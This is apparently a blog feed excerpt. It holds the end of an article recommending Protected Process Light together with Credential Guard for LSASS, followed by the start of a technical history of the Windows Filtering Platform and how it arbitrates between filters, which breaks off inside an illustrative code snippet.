Note: PPL prevents admin-from-user-mode reads of LSASS. Credential Guard prevents kernel-mode reads of the credentials themselves (and BYOVDLL-style execution at PPL/Lsa). Deploy both. itm4n's "complementary" framing in his RunAsPPL writeup [@itm4n-runasppl] is the right operational model. On Win11 22H2 and Windows Server 2025, Credential Guard is default-on for domain-joined non-DC systems with VBS-capable hardware [@learn-cg]; on older fleets, enable it explicitly via Group Policy or the Device Guard / Credential Guard configuration script. Always both -- either alone leaves a layer of the threat model uncovered.

Note: If you are an EDR vendor wanting your daemon to run at PPL/Antimalware, the path is fixed [@learn-mvi] [@learn-am-services]: 1. Hold Microsoft Virus Initiative membership; maintain independent-lab certification (AV-Comparatives, AV-Test, SE Labs, MRG Effitas, SKD Labs, VB 100, West Coast Labs, AVLab Cybersecurity Foundation). 2. Author an ELAM driver with an embedded <ELAM> resource section enumerating your user-mode binary signing-certificate hashes. 3. Submit the driver through WHQL for Microsoft co-signing. 4. Use Trusted Signing for your user-mode binaries. 5. Verify with Process Explorer that the service launches at PPL/Antimalware after install.

Practitioners who follow the checklist still need to know the common misconceptions. The next section catalogues them.

12. FAQ -- Common Misconceptions

Seven questions practitioners ask after their first PPL deployment.

Yes for full-access termination via `OpenProcess(PROCESS_TERMINATE, ...)`; an admin without a higher signer rung cannot terminate a `PPL/Antimalware` daemon by a direct kill. No for legitimate uninstall: the vendor's MSI installer (or equivalent) typically signals the daemon to shut itself down through its own service-control path, which is gated by ACL and not by the PPL lattice. Operationally, expect administrators to be able to uninstall your EDR but not to terminate its main process from outside the vendor toolchain. No. itm4n's verbatim warning is worth repeating [@itm4n-runasppl]: "I noticed that this protection tends to be confused with Credential Guard, which is completely different." PPL protects `lsass.exe` *as a process* from admin-from-user-mode reads. Credential Guard moves the *credentials themselves* into VTL1 memory via VBS. PPL is a VTL0 user-mode lattice control. Credential Guard is a VTL0 / VTL1 hypervisor boundary. They stack; see Section 9 for the layering and Section 11 Item 5 for the deployment recommendation. Because Microsoft has not classified PPL as a security boundary. The Windows Security Servicing Criteria define a security boundary as a logical separation between security domains at different levels of trust, and Microsoft's published enumeration excludes administrative-process-to-PPL from that list [@msrc-servicing] [@elastic-byovd-admin]. PPL is treated as a defense-in-depth feature. The operational implication is that PPL bypasses are fixed on the next major release cadence rather than out-of-band, with disclosure-to-fix half-lives ranging from approximately five to fifteen months historically (see Section 10 for the data). Practically no for non-AV applications. The protected-process EKU OIDs are gated by Microsoft's certificate authorities; only the Antimalware rung admits third-party certificates, and admission is mediated by ELAM driver + Microsoft Virus Initiative membership [@learn-mvi]. Hobbyist tooling cannot opt in. There is no public path for a non-AV third-party application to claim a PPL rung. If your application requires PPL-style anti-tampering, the realistic options are (a) become an MVI member if your application is an AV/EDR, (b) use Process Mitigation Policies such as Code Integrity Guard for code-injection resistance, or (c) deploy your sensitive operations inside a separate Microsoft-signed service. "Protected service" is informal terminology for a Windows service whose host process runs as a PPL, with the Service Control Manager configured to launch it at a specific signer rung. The deployment plumbing (SCM service configuration, service-DLL packaging, the signing of the host binary) is what makes a service "protected." The PPL machinery is what makes the host process actually resistant to tampering. The two terms describe the same thing from different angles -- one from the SCM-management view, one from the kernel-access-check view. Only if the smart-card middleware DLL is not signed at the LSA level (signer rung 4). Most major smart-card vendors have updated their middleware to be Microsoft-signed at the required level, but legacy or in-house middleware frequently fails enforcement. The recommended workflow is to run `AuditLevel = 8` for two months [@learn-runasppl], collect CodeIntegrity 3065 / 3066 events, enumerate the failing modules, re-sign or replace them, and only then switch to `RunAsPPL = 1`. Skipping the audit period is the single most common cause of authentication outages during LSA protection rollouts. Because the threat model PPL answers is *administrator-from-user-mode*, not *administrator-from-kernel-mode*. PPL is a kernel-enforced gate in the access-check pipeline, but a kernel-mode driver that can write to `EPROCESS.Protection` can zero the byte and disable the gate for any process. The defense against the kernel-mode attacker is a different mechanism: VBS-isolated credentials in VTL1 (Credential Guard), with HVCI / kernel-mode integrity controls preventing arbitrary kernel-mode code from running in the first place. PPL stops one threat; Credential Guard stops the threat one rung up; and the two are intended to be deployed together (Section 9, Section 11 Item 5).

The arc has run from a single Mimikatz error code to a kernel-enforced lattice, a third-party admission path mediated by ELAM and MVI, an arms race shaped by a single structural insight that the kernel verifies the channel and not the behaviour, and a stacked companion boundary that lives in VTL1 because VTL0 has run out of places to hide a key. PPL is not a security boundary. That classification is not a footnote; it is the most important fact about it, because it tells defenders that the mechanism is exactly as strong as the engineering velocity Microsoft chooses to invest. Deploy it. Stack it with Credential Guard. Monitor for the next bypass.

Key idea: The kernel verifies the channel. It does not verify the behaviour. Every PPL bypass since 2018 has lived in that seam, every fix has narrowed the channel, and the seam survives because behaviour is, by Rice's theorem, structurally outside what static signature verification can reason about.

Windows Filtering Platform: The Kernel-Mode Firewall You Don't See

noreply@paragmali.com (Parag Mali) — Tue, 12 May 2026 00:00:00 GMT

Open wf.msc. Right-click "Inbound Rules," click "New Rule," fill in the form, click OK. You think you just configured a firewall. What you actually did was register one filter, inside one sublayer, at one of roughly sixty filtering layers in the kernel-mode classification path of a platform you have never named. The same platform is also running IPsec, container networking, Microsoft Defender for Endpoint's network protection, and every third-party EDR's network-telemetry pipeline on the Windows host you are using right now.

The Windows Filtering Platform (WFP) is the kernel- and user-mode service Microsoft shipped with Windows Vista in November 2006 to replace four mutually-incompatible XP-era hooks: NDIS intermediate drivers, the filter-hook IOCTL on `\Device\Ipfilterdriver`, Winsock Layered Service Providers, and TDI filter drivers. It is the substrate beneath Windows Defender Firewall, Windows IPsec, WinNAT, the Hyper-V Extensible Switch, Defender for Endpoint Network Protection, and every third-party EDR's network telemetry. WFP is not a firewall. It is the platform that a firewall is one consumer of. It arbitrates competing security products deterministically through 64-bit filter weights inside priority-ordered sublayers, and that arbitration model is the load-bearing reason third-party callouts can finally coexist on the same host. The same kernel-extensibility tax that doomed the pre-WFP hooks now resurfaces as a steady drip of Base Filtering Engine elevation-of-privilege CVEs (CVE-2023-29368, CVE-2024-38034) -- the running cost of a platform sophisticated enough to host every downstream network-security feature Windows ships.

1. You Just Clicked OK on Sixty Filtering Layers

The firewall UI is the visible one percent of WFP. Almost every modern Windows network-security feature is a configuration of the same engine.

That is the central claim of this article, and it is the kind of statement that sounds like marketing until you trace the actual wires. Trace them once and you stop seeing "Windows Defender Firewall" and "IPsec" and "Windows containers" as separate products. They are all clients of the same kernel/user-mode service, configuring the same filter engine, arbitrated by the same Base Filtering Engine, classified across the same approximately sixty FWPM_LAYER_* identifiers [@wfp-layers].

Microsoft's cross-mode network-traffic filtering service introduced in Windows Vista and Windows Server 2008. WFP "is designed to replace previous packet filtering technologies such as Transport Driver Interface (TDI) filters, Network Driver Interface Specification (NDIS) filters, and Winsock Layered Service Providers (LSP)" [@wfp-start]. The platform has five components: the Filter Engine, the Base Filtering Engine, a set of kernel-mode shims, callout drivers, and the management API [@wfp-about]. A Windows service named `bfe` that, in Microsoft's own words, "controls the operation of the Windows Filtering Platform" and "plumbs configuration settings to other modules in the system. For example, IPsec negotiation polices go to IKE/AuthIP keying modules, filters go to the filter engine" [@wfp-about]. The BFE is not the Windows Firewall. The Windows Firewall is a separate service (`MpsSvc`) that talks to the BFE.

The naming is the first thing that trips readers. There is a service called BFE and a service called MpsSvc. They live in different rows of Get-Service output. They have different binary backings. The dependency arrow runs one way: MpsSvc requires BFE, never the other direction. That asymmetry, which seems pedantic, turns out to be load-bearing for the rest of the story. WFP is the platform. The firewall is a tenant.

Key idea: The firewall UI is the visible one percent of WFP. Almost every modern Windows network-security feature -- Windows Defender Firewall with Advanced Security, Windows IPsec, WinNAT and container networking, the Hyper-V Extensible Switch, Microsoft Defender for Endpoint Network Protection, every third-party EDR with a network filter -- is a configuration of the same engine [@forshaw-2021].

If WFP is the engine, what was there before it? Why did Microsoft need to build a platform when Windows XP SP2 had already shipped a firewall?

2. Before WFP -- An Internet on Fire

April 2004. Sasser is propagating through the LSASS RPC interface on port 445, infecting unpatched Windows machines within minutes of their first cable plug. Microsoft has just shipped Windows XP SP2, with the Internet Connection Firewall rebranded as "Windows Firewall" and turned on by default for the first time [@wiki-winfw].Wikipedia notes that "the ongoing prevalence of these worms through 2004 resulted in unpatched machines being infected within a matter of minutes," and that Microsoft "switched it on by default since Windows XP SP2." XP SP2 reached general availability on August 25, 2004 [@wiki-winfw]. That fixed the worm problem. It did not fix the plumbing problem.

The plumbing problem was that third-party security vendors were already hooking the Windows network stack at four different, mutually incompatible places, none of which arbitrated with the others. ZoneAlarm, Norton Internet Security, McAfee, Kerio, Check Point, BlackICE, and a dozen others were shipping kernel drivers that bolted onto Windows wherever they could find a callable surface [@wiki-winfw][@forshaw-2021]. They picked four families.

Network Driver Interface Specification (NDIS) intermediate drivers. NDIS 5.x exposed a profile called the intermediate driver that sat below the protocol stack and above the miniport. A vendor could install a driver that saw every Ethernet frame on the way up and every IP packet on the way down. The price was complexity: NDIS intermediate drivers had to participate in the entire NDIS binding state machine, and Microsoft's own documentation later admitted that the model was painful enough that the platform team replaced it with the much simpler NDIS Lightweight Filter (LWF) in NDIS 6.0 [@ndis-filter].

Filter-hook drivers on \Device\Ipfilterdriver. The IP filter driver exposed a single IOCTL, IOCTL_PF_SET_EXTENSION_POINTER, that registered a single callback function the kernel would invoke on every received or transmitted IP packet [@ipfilter-legacy]. There was one callback pointer per machine. IPv4 only. Network layer only. No documented contract for what happened when a second vendor registered.

Winsock Layered Service Providers (LSPs). A user-mode shim chained into every Winsock application, in process. LSPs had access to per-application context, but their cost was paid in blast radius: Microsoft's own categorisation guide warned that "certain system critical processes such as winlogon and lsass create sockets" and that "a number of cases have also been documented where buggy LSPs can cause lsass.exe to crash. If lsass crashes, the system forces a shutdown" [@lsp-categories].

A user-mode DLL that chains into the Winsock service-provider stack of every process that opens a socket. LSPs were the Windows mechanism for content inspection and per-application network rules before Vista. They are still installable, but Microsoft's documentation now categorises which processes must not load them because of the lsass-crash failure mode [@lsp-categories].

TDI filter drivers. The Transport Driver Interface, the legacy kernel interface above TCP/IP, supported a filter-driver pattern that preserved application identity and could veto connections at the transport. It was the cleanest of the four options. It also stopped being a viable target the moment Microsoft deprecated TDI in Vista: "The TDI feature is deprecated and will be removed in future versions of Microsoft Windows. Depending on how you use TDI, use either the Winsock Kernel (WSK) or Windows Filtering Platform (WFP)" [@tdi-legacy].

Four hooks, four failure modes, no arbitration between any of them. In May 2006 Madhurima Pawar and Eric Stenson of Windows Networking walked the WinHEC audience through one number that captured the consequence: firewall and antivirus conflicts accounted for 12 percent of all Windows operating-system crashes [@pawar-stenson-winhec].

Reduces firewall and anti-virus crashes -- 12% of all OS crashes. -- Madhurima Pawar and Eric Stenson, WinHEC 2006 [@pawar-stenson-winhec]

That is the design motivation for WFP in twelve words. The XP-era hook zoo was not a security architecture; it was a steady source of bluescreens. Microsoft's documentation reads, looking back at the era from Vista: "Starting in Windows Server 2008 and Windows Vista, the firewall hook and the filter hook drivers are not available; applications that were using these drivers should use WFP instead" [@wfp-start]. As Forshaw later summarised it, "these firewalls were implemented by hooking into Network Driver Interface Specification (NDIS) drivers or implementing user-mode Winsock Service Providers but this was complex and error prone" [@forshaw-2021].

flowchart TD NIC[Physical NIC] --> MINI[NDIS miniport driver] MINI --> IM["NDIS 5.x intermediate driver
(hook #1: NDIS-IM)"] IM --> TCPIP[TCPIP.SYS] TCPIP -.-> IPF["\Device\Ipfilterdriver
(hook #2: filter-hook IOCTL)"] TCPIP --> TDI["TDI transport providers"] TDI --> TDIF["TDI filter driver
(hook #3: TDI filter)"] TDIF --> AFD[AFD.SYS] AFD --> WS2[ws2_32.dll Winsock] WS2 --> LSP["Winsock LSP chain
(hook #4: in-process LSP)"] LSP --> APP[Application]

So why didn't Microsoft just fix the hooks? Why a whole new platform?

3. Why Four Hooks Could Not Be Saved

Picture a Windows XP machine in 2005, four months past SP2. The user, doing what users do, installs two antivirus suites: one from a free trial that came with the laptop, one from work. Each ships a kernel driver. Each one calls IOCTL_PF_SET_EXTENSION_POINTER on \Device\Ipfilterdriver to register a packet-inspection callback [@ipfilter-legacy]. An hour later the machine bluescreens during a Windows Update download.

The Microsoft documentation for the IOCTL is precise about what the call does ("registers filter-hook callback functions to the IP filter driver to inform the IP filter driver to call those filter hook callbacks for every IP packet that is received or transmitted") and silent about what happens if a second driver makes the same call before the first one unregisters [@ipfilter-legacy]. The page does not document chaining semantics. There is no mention of a registration list, a callback array, a refcount, or a priority. The driver writers got to invent that themselves, separately, in shipped products. The crash reports speak for the result.

Note: Microsoft Learn documents the filter-hook registration mechanism on \Device\Ipfilterdriver exactly once, in the legacy reference for IOCTL_PF_SET_EXTENSION_POINTER [@ipfilter-legacy]. The page tells you how to register a callback. It does not tell you what happens when two callers register concurrently. That gap is the architectural bug. The 12-percent-of-OS-crashes number from WinHEC 2006 is the bill [@pawar-stenson-winhec].

Each of the four pre-WFP hooks had a specific architectural flaw. Together those flaws define what WFP had to be.

Filter-hook (IpFilterDriver). One callback pointer per machine; no arbitration; IPv4 only; network layer only. Two security products fight over one callback, and there is no documented way to chain them. Failure: arbitration impossible, vendor coexistence accidental.

NDIS 5.x intermediate driver. High complexity, no application identity (it sees frames, not processes), install-order-dependent binding chains. Microsoft's own assessment of the model, written for the LWF replacement that came in 2006, is: "Filter drivers are easier to implement and have less processing overhead than NDIS intermediate drivers" [@ndis-filter]. Failure: too low for app-aware policy, too painful to write.

TDI filter. Preserved application identity. Vetoed connections at the transport boundary. Architecturally the cleanest of the four. Then Microsoft deprecated TDI in Vista [@tdi-legacy] and the substrate evaporated. Failure: the floor disappeared.

Winsock LSP. In-process. User mode. Bypassable by any program that called Nt* system services directly. And, as the Microsoft categorisation page documents, a buggy LSP that crashes LSASS will take down the entire machine [@lsp-categories]. Failure: in process, bypassable, lethal when buggy.

Pre-WFP hook	Layer	App identity	Multi-vendor	Failure mode	Successor
Filter-hook (`IpFilterDriver`)	Network (L3)	No	No documented contract for chaining	Arbitration impossible [@ipfilter-legacy]	WFP filter at `INBOUND_IPPACKET_*`
NDIS 5.x intermediate	Data link (L2)	No	Install-order dependent	Too low for app-aware rules; complex [@ndis-filter]	NDIS Lightweight Filter (LWF)
TDI filter	Transport (L4)	Yes	Yes (chainable)	Substrate deprecated in Vista [@tdi-legacy]	WFP ALE + Winsock Kernel (WSK)
Winsock LSP	Above sockets (user mode)	Yes	Chainable in-process	In-process bypass; lsass blast radius [@lsp-categories]	WFP ALE; LSP retained for non-security uses

Walk those failure modes column by column and a design constraint set falls out. Whatever Microsoft was going to build had to:

Arbitrate multiple vendors deterministically. No more "first IOCTL wins."
Carry application identity through to the inspection point.
Concentrate inspection at one platform, not four.
Run out of process where possible. A buggy callout cannot be allowed to take down LSASS.
Resolve conflicts predictably, with rules a third-party developer can read and design against.

sequenceDiagram participant A as Vendor A installer participant B as Vendor B installer participant K as \Device\Ipfilterdriver participant P as IP packet path A->>K: IOCTL_PF_SET_EXTENSION_POINTER(callback_A) Note over K: callback = callback_A B->>K: IOCTL_PF_SET_EXTENSION_POINTER(callback_B) Note over K: callback = callback_B (no chaining contract) P->>K: packet arrives K->>B: callback_B(packet) Note over A: callback_A no longer invoked, vendor A stops working A->>K: re-register callback_A Note over K: race: pointer flips again K--xP: inconsistent state, BSOD

Vista shipped November 2006. What did the architects build to satisfy all five constraints at once?

4. The Evolution -- Five Generations of WFP

May 23-25, 2006, Seattle. Madhurima Pawar, Program Manager in Windows Networking, and Eric Stenson, Development Lead in Windows Networking, stand in front of a hostile room of third-party firewall ISVs at WinHEC and present "Windows Filtering Platform And Winsock Kernel: Next-Generation Kernel Networking APIs." Slide 6 carries the design motivation that this article opened on: 12 percent of all OS crashes are firewall and AV conflicts. Slide 7 carries the architecture diagram [@pawar-stenson-winhec]. Six months later Vista shipped, with the filter-hook and firewall-hook drivers gone from the system and a new platform in their place [@wfp-start].Windows Vista was released to manufacturing on November 8, 2006, and made generally available to consumers on January 30, 2007 [@wiki-vista].

Generation 1: WFP v1 in Vista and Server 2008

WFP v1 introduced five named components. They are still the components the platform ships today. Microsoft's own "About Windows Filtering Platform" page enumerates them: the Filter Engine ("the core multi-layer filtering infrastructure, hosted in both kernel-mode and user-mode"); the Base Filtering Engine ("a service that controls the operation of the Windows Filtering Platform"); shims ("kernel-mode components that reside between the kernel-mode network stack and the filter engine"); callout drivers; and the management API [@wfp-about].

The core of WFP. Microsoft's WDK reference defines it as "a component of the Windows Filtering Platform that stores filters and performs filter arbitration. Filters are added to the filter engine at designated filtering layers so that the filter engine can perform the desired filtering action (permit, drop, or a callout). If a filter in the filter engine specifies a callout for the filter's action, the filter engine calls the callout's classifyFn function" [@wfp-filter-engine]. The engine is hosted in both kernel mode and user mode; its kernel classification path runs primarily inside `NETIO.SYS` [@forshaw-2021]. A kernel-mode bridge between a specific network stack module and the WFP filter engine. Vista shipped six shims: the Application Layer Enforcement (ALE) shim, the Transport Layer Module shim, the Network Layer Module shim, the ICMP Error shim, the Discard shim, and the Stream shim [@wfp-about]. Each shim invokes the filter engine at one or more `FWPM_LAYER_*` identifiers when traffic crosses it.

The most consequential of those six shims is ALE.

"A set of Windows Filtering Platform (WFP) kernel-mode layers that are used for stateful filtering" [@wfp-ale]. ALE keeps per-connection state across packets, and -- this is the line that separates ALE from the rest of the platform -- "ALE layers are the only WFP layers where network traffic can be filtered based on the application identity -- using a normalized file name -- and based on the user identity -- using a security descriptor" [@wfp-ale]. ALE is why per-application firewall rules became possible in 2006. It is also the layer that classifies AppContainer connections in modern Windows.

ALE pays for stateful filtering with bandwidth, not latency. The Microsoft Learn page makes the performance claim explicit: at ALE layers, the platform "minimally impacts network performance by processing only the first packet in a connection" [@wfp-about]. Subsequent packets ride the existing flow state. That choice is what lets a per-process firewall rule scale to gigabit network rates.

April 12, 2010. Microsoft ships a Windows Filtering Platform driver hotfix rollup, KB981889, that bundles three previously-separate fixes into one package. The Microsoft Support page enumerates them verbatim [@kb981889]:

KB976759 -- "WFP drivers may cause a failure to disconnect the RDP connection to a multiprocessor computer."

KB979278 -- "Using two Windows Filtering Platform (WFP) drivers causes a computer to crash."

KB979223 -- "A nonpaged pool memory leak occurs when you use a WFP callout driver."

Read KB979278 again. Two WFP drivers cause a crash. The XP-era "two AV vendors fight" bug had survived into the new platform, in a different shape: the WFP arbitration model held -- the conflict between filters was deterministic -- but the callout driver lifecycle had not yet been hardened. That distinction is the structural seed of the BFE elevation-of-privilege CVE class fifteen years later. Section 8 returns to it.

Generation 2: WFP v2 in Windows 8 and Server 2012

Windows 8 and Server 2012 shipped a refresh in 2012. The "What's New in Windows Filtering Platform" page enumerates the delta in four bullets [@wfp-whatsnew]:

"Layer 2 filtering: Provides access to the L2 (MAC) layer, allowing filtering of traffic at that layer. vSwitch filtering: Allows packets traversing a vSwitch to be inspected and/or modified. WFP filters or callouts can be used at the vSwitch ingress and egress. App container management: Allows access to information about app containers and network isolation connectivity issues. IPsec updates: Extended IPsec functionality including connection state monitoring, certificate selection, and key management." [@wfp-whatsnew]

Four features, but the second one -- vSwitch filtering -- is the architecturally significant one. With Windows 8, WFP slid under the Hyper-V Extensible Switch. From that release forward, every Hyper-V VM's packet path is a WFP-extensible classification problem, and the same kernel-mode platform that filters host traffic also filters tenant traffic [@wfp-whatsnew].

Generation 3: Windows 10 ALE redirection (2015-2021)

The Windows 10 family added two ALE layers that did not exist in Vista: CONNECT_REDIRECT and BIND_REDIRECT. The "ALE Layers" page lists them at the bottom of its enumeration [@wfp-ale-layers]. Their job is exactly what their names say -- redirect an outbound connection (proxy it through a different address), or redirect a bind (force a process to bind to a different local endpoint). Web proxies, transparent forwarders, and AppContainer policy now had a kernel-side hook that did not exist before. Forshaw's 2021 Project Zero post documents how the modern Windows Defender Firewall pipeline runs through these layers end-to-end: "MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel... The evaluation is handled primarily by the NETIO driver as well as registered callout drivers" [@forshaw-2021].

Generation 4: URO and the CVE drumbeat (2022-2024)

The most recent generation comes in two parallel tracks. The first is a hardware offload feature. NDIS 6.89, the version of the NDIS driver interface that "is included in Windows 11, version 24H2 and Windows Server 2022 and later," adds support for UDP Receive Segment Coalescing Offload, "this hardware offload enables NICs to coalesce UDP receive segments. NICs can combine UDP datagrams from the same flow that match a set of rules into a logically contiguous buffer. These combined datagrams are then indicated to the Windows networking stack as a single large packet" [@ndis-689]. Windows 11 24H2 reached general availability on October 1, 2024 [@wiki-win11-24h2].

The second track is a sequence of elevation-of-privilege CVEs in the Base Filtering Engine. CVE-2023-29368, published June 14, 2023, is a CWE-415 double-free with a CVSS base of 7.0 [@nvd-2023-29368]. CVE-2024-38034, published July 9, 2024, is a CWE-190 integer overflow with a CVSS base of 7.8 [@nvd-2024-38034]. The 2024 vulnerability's attack-complexity sub-score dropped from AC:H (high) in 2023 to AC:L (low) in 2024. The exploitability sub-score rose from 1.0 to 1.8 over the same interval [@nvd-2023-29368][@nvd-2024-38034]. The trend line is that BFE EoP is getting easier to weaponise, not harder.

flowchart TD UM["User-mode application
(e.g. wf.msc / netsh / MpsSvc)"] --> API["Fwpm* management API
(fwpuclnt.dll)"] API --> BFE["Base Filtering Engine service
(bfe, user mode)"] BFE --> FE["Filter Engine
(kernel + user mode)"] FE --> KCLI["fwpkclnt.sys
(kernel-mode WFP client / export driver)"] FE --> NETIO["NETIO.SYS
(classification path)"] NETIO --> ALE["ALE shim"] NETIO --> TLM["Transport-Layer shim"] NETIO --> NLM["Network-Layer shim"] NETIO --> STREAM["Stream shim"] NETIO --> ICMP["ICMP-Error shim"] NETIO --> DISC["Discard shim"] ALE --> COUT["Callout drivers
(IPsec, in-box stealth, EDR, 3rd-party)"] TLM --> COUT NLM --> COUT STREAM --> COUT ICMP --> COUT DISC --> COUT timeline title Five generations of the Windows Filtering Platform 2006-11 : Windows Vista / Server 2008 -- WFP v1 (filter engine, BFE, six shims, callouts) 2010-04 : KB981889 hotfix rollup -- three named WFP driver bugs, including two-WFP-drivers crash 2012-09 : Windows 8 / Server 2012 -- WFP v2 (L2, vSwitch, AppContainer, IPsec extensions) 2015-21 : Windows 10 -- ALE CONNECT_REDIRECT / BIND_REDIRECT, AppContainer-aware ALE 2023-06 : CVE-2023-29368 published (CWE-415 double-free, CVSS 7.0) 2024-07 : CVE-2024-38034 published (CWE-190 integer overflow, CVSS 7.8) 2024-10 : Windows 11 24H2 -- NDIS 6.89 adds URO (UDP receive coalescing)

Timeline sources, in row order: WinHEC 2006 and the Vista release on the Microsoft Learn WFP start page [@pawar-stenson-winhec][@wfp-start]; KB981889 [@kb981889]; the "What's New" page [@wfp-whatsnew]; ALE Layers [@wfp-ale-layers] and Forshaw 2021 [@forshaw-2021]; the NVD records for CVE-2023-29368 and CVE-2024-38034 [@nvd-2023-29368][@nvd-2024-38034]; NDIS 6.89 introduction and the Windows 11 24H2 GA date [@ndis-689][@wiki-win11-24h2].

Five generations, one engine, no replacements. Why does the same engine still ship in 2026? What is the architectural insight that made it last?

5. Sublayers, Weights, and Veto -- The Arbitration Insight

Here is the question every Windows administrator has wondered: how do two competing security products coexist on the same machine without crashing each other? Before Vista the honest answer was, "they didn't, mostly, and when they did it was an accident." After Vista the honest answer is, "WFP arbitrates them deterministically." The mechanism is the load-bearing piece of the platform, and it is built out of two ideas.

Idea 1: Sublayers and weights

Microsoft's "Filter Arbitration" page describes the algorithm in two sentences that almost no Windows administrator has read:

"Each filter layer is divided into sub-layers ordered by priority (also called weight). Network traffic traverses sub-layers from the highest priority to the lowest priority... Within each sub-layer, filters are ordered by weight. Network traffic is indicated to matching filters from highest weight to lowest weight." [@wfp-arbitration]

A layer (say, FWPM_LAYER_ALE_AUTH_CONNECT_V4, the place where outbound IPv4 TCP connection authorization is decided) contains an ordered list of sublayers. Each sublayer contains an ordered list of filters. Sublayer priority orders the sublayers. Filter weight orders the filters within a sublayer. Network traffic walks the structure top-down, sublayer by sublayer, filter by filter, until a terminal action is reached.

A named, priority-ordered subdivision of a WFP filtering layer. Each sublayer owns a list of filters and has its own GUID. Microsoft's recommendation, in the filter-weight documentation, is that independent vendors "create their own sublayer by using `FwpmSubLayerAdd0`" rather than register filters into another vendor's sublayer [@wfp-weight]. Sublayer priority is what lets two vendors coexist without interfering. A 64-bit value attached to a filter that orders evaluation within a sublayer. The "Filter Weight Assignment" page documents three legal assignment styles: "Set the weight to an FWP_UINT64. BFE uses the supplied weight as is. Set the weight to FWP_EMPTY. BFE automatically generates a weight in the range [0, 2^60). Set the weight to an FWP_UINT8 in the range [0, 15]. BFE uses the supplied weight as a weight range identifier" [@wfp-weight]. Sixteen high-order weight ranges, $[0, 2^{60})$ within each, give vendors a way to carve out non-overlapping neighbourhoods.

The mathematical model is simpler than the prose suggests. Filter weight is an element of $[0, 2^{64})$. A filter at weight $w_1$ runs before a filter at weight $w_2$ inside the same sublayer if $w_1 > w_2$. Sublayer priority orders the sublayers themselves. When a vendor registers its sublayer at, say, priority 0x1000 and chooses filters in the weight range $[2^{60}, 2^{61})$, that vendor has a deterministic neighbourhood that no other vendor will trample, provided the other vendors follow Microsoft's recommendation to call FwpmSubLayerAdd0 and use their own sublayer.The 16-range partitioning via FWP_UINT8 weights is the mechanism that the platform team baked in to give vendors a coordination protocol without requiring vendors to talk to each other. Microsoft Learn's recommendation, verbatim: "This issue can be prevented by having callouts create their own sublayer by using FwpmSubLayerAdd0" [@wfp-weight].

Idea 2: Block-overrides-Permit with Veto

Filter arbitration is actually two passes, not one. Within a single sublayer, the engine evaluates the filters that match in weight order from highest to lowest, and stops at the first filter that returns Permit or Block. That first matching filter wins; lower-weight filters in the same sublayer never run. The engine then performs the same pass on the next sublayer down. Once every sublayer has produced a verdict, the BFE composes those per-sublayer verdicts into one per-layer decision -- and that is where Block-over-Permit and the soft/hard override flag come in. Filter Arbitration states the second pass:

"'Block' overrides 'Permit'. 'Block' is final (cannot be overridden) and stops the evaluation. The packet is discarded." [@wfp-arbitration]

"Block" and "Permit" each come in two variants. The variant is set by a per-action flag, FWPS_RIGHT_ACTION_WRITE, in the callout's classify-output structure: "If the flag is set, it indicates that the action can be overridden. If the flag is absent, the action cannot be overridden" [@wfp-arbitration]. The four-cell table below is the override-policy table the BFE uses to compose per-sublayer verdicts into one layer-level action.

Action	Override allowed?	Common name	What it means
Permit + `FWPS_RIGHT_ACTION_WRITE`	Yes	Soft permit	A lower-priority sublayer's verdict (composed later by the BFE) may overturn it [@wfp-arbitration]
Permit, flag absent	No	Hard permit	Final permit; only a callout Veto in another sublayer can block. [@wfp-arbitration]
Block + `FWPS_RIGHT_ACTION_WRITE`	Yes	Soft block	A lower-priority sublayer may overturn it, but Block-over-Permit still applies if no override fires [@wfp-arbitration]
Block, flag absent	No	Hard block	Final block. Evaluation stops. Packet discarded. [@wfp-arbitration]

The soft/hard distinction is therefore a cross-sublayer property, not a within-sublayer one. Within a sublayer the rule is "first match wins"; only the composition step between sublayers consults the override flag.

There is a fifth case. A callout that returns FWP_ACTION_BLOCK while it could have returned FWP_ACTION_PERMIT is exercising what the documentation calls a Veto. The callout has been given the opportunity to authorize a packet and has refused. That is how a third-party EDR's deep-inspection callout can refuse a flow that an in-box filter has already soft-permitted, without ever knowing the soft-permit happened: the engine offers the packet, the callout says no, and the no is final.

sequenceDiagram participant E as Filter engine participant S1 as Sublayer @ priority 100 (no matching filter) participant S2 as Sublayer @ priority 50 (winner: soft permit) participant S3 as Sublayer @ priority 10 (winner: hard permit) participant C as Deep-inspection callout (registered in default sublayer) E->>S1: evaluate highest-priority sublayer S1-->>E: no matching filter (Continue) E->>S2: evaluate next sublayer S2-->>E: Soft Permit (FWPS_RIGHT_ACTION_WRITE) Note over E: tentative layer action = Permit (overridable) E->>S3: evaluate next sublayer S3-->>E: Hard Permit (no override flag) Note over E: layer action = Permit (final unless a callout vetoes) E->>C: invoke callout for the permitted flow C-->>E: Veto -> Block (terminal) Note over E: final layer-level action = Block

Walk a worked example. An AppContainer process (an Edge tab, say, or any process launched with CreateProcess and an AppContainer SID token) tries to open an outbound TCP connection to 203.0.113.5:443. The Windows TCP/IP stack invokes the ALE shim, which classifies the connection request at FWPM_LAYER_ALE_AUTH_CONNECT_V4. The filter engine walks the sublayers at that layer from highest priority to lowest. Within each sublayer, filters fire highest-weight-first, and the first matching Permit or Block ends evaluation in that sublayer. If a vendor EDR has placed a Veto-style deep-inspection callout in its own sublayer, the callout runs and can deny the connection regardless of what any other sublayer would have done. If no filter explicitly permits the AppContainer with the matching capability SID (internetClient, internetClientServer, or privateNetworkClientServer), the "Block Outbound Default Rule" filter in the firewall's default sublayer fires last and the connection is denied [@forshaw-2021].

{` // Faithful translation of the Microsoft Learn "Filter Arbitration" algorithm // for the cross-sublayer composition pass. The within-sublayer pass (not // shown) returns one verdict per sublayer using a first-match-wins rule on // weight-ordered filters. This function composes those per-sublayer verdicts // into the layer-level action using FWPS_RIGHT_ACTION_WRITE semantics. // Source: https://learn.microsoft.com/en-us/windows/win32/fwp/filter-arbitration

// Each element is the winning verdict from one sublayer, ordered by sublayer // priority from highest to lowest. const sublayerVerdicts = [ // Vendor EDR deep-inspection callout, hard block on a known-bad destination { sublayer: 'EDR-veto', priority: 100n, match: (pkt) => pkt.dst === '203.0.113.5', verdict: () => HARD_BLOCK }, // Windows Defender Firewall app rule, allow-with-override { sublayer: 'WDF-allow', priority: 50n, match: () => true, verdict: () => SOFT_PERMIT }, // Block Outbound Default Rule (BFE default sublayer) { sublayer: 'block-default',priority: 10n, match: () => true, verdict: () => HARD_BLOCK }, ];

